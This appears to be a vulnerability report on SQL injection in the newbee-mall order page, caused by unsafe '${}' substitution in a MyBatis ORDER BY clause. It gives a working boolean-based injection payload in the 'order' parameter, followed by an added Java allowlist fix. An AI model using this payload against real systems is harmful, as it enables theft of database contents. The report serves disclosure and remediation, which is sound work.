SQL injection exists in newbee mall on order page
<if test="sortField!=null and order!=null">
order by ${sortField} ${order} is not precompiled, allowing logged-in attackers to steal sensitive information such as databases by constructing malicious SQL statements.
newbee-mall-plus-main\src\main\resources\mapper\NewBeeMallOrderMapper.xml
Payload: _search=false&nd=1693539277711&limit=20&page=111&sidx=createTime&order=desc,(SELECT (CASE WHEN (1153=1153) THEN 1 ELSE 1153*(SELECT 1153 FROM INFORMATION_SCHEMA.PLUGINS) END))&totalrows=
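
One way to close this, as an added example that is not code from the issue or from the newbee-mall project: MyBatis `${}` substitution is textual, and an ORDER BY column or direction cannot be bound as a `#{}` parameter, so both values are restricted to an allowlist before they reach the mapper. The class name `OrderSortGuard`, the `orderId` entry and the column names are assumptions for illustration; `createTime` is the `sidx` value from the report.

```java
import java.util.Locale;
import java.util.Map;

/** Added example: allowlist for the values that reach "order by ${sortField} ${order}". */
public final class OrderSortGuard {

    // Request value -> column name. "createTime" is the sidx value from the report;
    // the column names and the "orderId" entry are assumptions, not the project's schema.
    private static final Map<String, String> SORTABLE = Map.of(
            "createTime", "create_time",
            "orderId", "order_id");

    private OrderSortGuard() { }

    /** Returns a column name from the allowlist, or throws if sidx is not on it. */
    public static String sortField(String sidx) {
        String column = (sidx == null) ? null : SORTABLE.get(sidx);
        if (column == null) {
            throw new IllegalArgumentException("unsupported sort field");
        }
        return column;
    }

    /** Returns exactly "ASC" or "DESC"; any other value is rejected. */
    public static String direction(String order) {
        String d = (order == null) ? "" : order.trim().toUpperCase(Locale.ROOT);
        if (!d.equals("ASC") && !d.equals("DESC")) {
            throw new IllegalArgumentException("unsupported sort direction");
        }
        return d;
    }

    public static void main(String[] args) {
        // Constructed inputs: a normal request, then an order value that carries
        // extra SQL after the direction keyword, as in the report.
        System.out.println(sortField("createTime") + " " + direction("desc"));
        try {
            direction("desc,(SELECT 1)");
        } catch (IllegalArgumentException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

Only the strings returned by `sortField` and `direction` should be passed into the mapper parameters, so the text substituted by `${sortField}` and `${order}` is always one of a fixed set of server-side constants.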